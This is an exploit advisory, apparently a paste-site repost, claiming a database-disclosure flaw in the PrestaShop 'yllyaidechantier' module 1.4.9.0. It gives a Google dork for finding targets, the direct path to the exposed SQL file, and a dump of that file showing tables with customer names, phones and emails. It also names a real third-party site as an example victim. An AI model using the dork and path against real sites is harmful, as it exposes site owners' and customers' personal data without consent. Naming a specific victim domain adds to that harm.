· 7 years ago · Dec 24, 2018, 12:22 AM
1###########################################################################
2
3# Exploit Title : PrestaShop yllyaidechantier Modules 1.4.9.0 Database Disclosure
4# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5# Date : 24/12/2018
6# Vendor Homepage : prestashop.com
7# Software Download Link : N/A
8# Tested On : Windows and Linux
9# Category : WebApps
10# Version Information : 1.4.9.0
11# Exploit Risk : Medium
12# Google Dorks : inurl:''/modules/yllyaidechantier/db/''
13# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
14CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
15
16###########################################################################
17
18# Exploit :
19
20/modules/yllyaidechantier/db/ydb.sql
21
22###########################################################################
23
24# Example SQL Database Dump Information Exposure =>
25
26-- phpMyAdmin SQL Dump
27-- version 4.0.4
28-- http://www.phpmyadmin.net
29--
30-- Client: localhost
31--
32Généré le: Lun 07 Avril 2014 à 16:27
33-- Version du serveur: 5.5.20-log
34-- Version de PHP: 5.3.10
35
36SET
37SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
38SET time_zone = "+00:00";
39
40
41/*!40101 SET
42@OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
43/*!40101 SET
44@OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
45/*!40101 SET
46@OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
47/*!40101
48SET NAMES utf8 */;
49
50--
51-- Base de données: `velux`
52--
53CREATE DATABASE IF NOT EXISTS `velux`
54DEFAULT CHARACTER SET latin1 COLLATE latin1_swedish_ci;
55USE `velux`;
56
57-- --------------------
58------------------------------------
59
60--
61-- Structure de la table `ps_y_aidechantier_demande`
62--
63
64
65DROP TABLE IF EXISTS `ps_y_aidechantier_demande`;
66CREATE TABLE IF NOT EXISTS
67`ps_y_aidechantier_demande` (
68 `id_demande` int(11) NOT NULL AUTO_INCREMENT,
69 `id_template
70` int(11) NOT NULL,
71 `id_customer` int(11) NOT NULL,
72 `id_scenario` int(11) NOT NULL,
73 `lastname`
74varchar(500) NOT NULL,
75 `firstname` varchar(500) NOT NULL,
76 `phone` varchar(50) NOT NULL,
77
78`email` varchar(500) NOT NULL,
79 `fax` varchar(50) NOT NULL,
80 `chantier_charpente` varchar(500)
81NOT NULL,
82 `chantier_couverture` varchar(500) NOT NULL,
83 `chantier_fenetre` varchar(500) NOT NULL,
84
85 `chantier_raccord` varchar(500) NOT NULL,
86 `chantier_isolation` varchar(500) NOT NULL,
87
88 `chantier_domotique` varchar(500) NOT NULL,
89 `date_add` date NOT NULL,
90 PRIMARY KEY
91(`id_demande`)
92) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;
93
94-- ----------------
95----------------------------------------
96
97--
98-- Structure de la table `ps_y_aidechantier_scenario`
99--
100
101DROP TABLE IF
102EXISTS `ps_y_aidechantier_scenario`;
103CREATE TABLE IF NOT EXISTS `ps_y_aidechantier_scenario`
104 (
105 `id_scenario` int(11) NOT NULL AUTO_INCREMENT,
106 `id_template` int(11) NOT NULL,
107
108`title` varchar(500) NOT NULL,
109 `price` double NOT NULL,
110 `date_add` date NOT NULL,
111
112PRIMARY KEY (`id_scenario`)
113) ENGINE=InnoDB DEFAULT CHARSET=latin1
114AUTO_INCREMENT=3 ;
115
116-- --------------------------------------------------------
117
118--
119-- Structure de la table
120`ps_y_aidechantier_template`
121--
122
123DROP TABLE IF EXISTS `ps_y_aidechantier_template`;
124CREATE
125TABLE IF NOT EXISTS `ps_y_aidechantier_template` (
126 `id_template` int(11)
127NOT NULL AUTO_INCREMENT,
128 `id_product` int(11) NOT NULL,
129 `name` varchar(500) NOT NULL,
130
131`date_add` date NOT NULL,
132 PRIMARY KEY (`id_template`),
133 UNIQUE KEY `id_product_2` (`id_product`),
134
135 KEY `id_product` (`id_product`)
136) ENGINE=InnoDB DEFAULT CHARSET=latin1
137AUTO_INCREMENT=8 ;
138
139/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT
140*/;
141/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
142/*!40101
143 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
144
145
146###########################################################################
147
148# Example Vulnerable Site =>
149
150[+] portailpro.fr/modules/yllyaidechantier/db/ydb.sql
151
152###########################################################################
153
154# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
155
156###########################################################################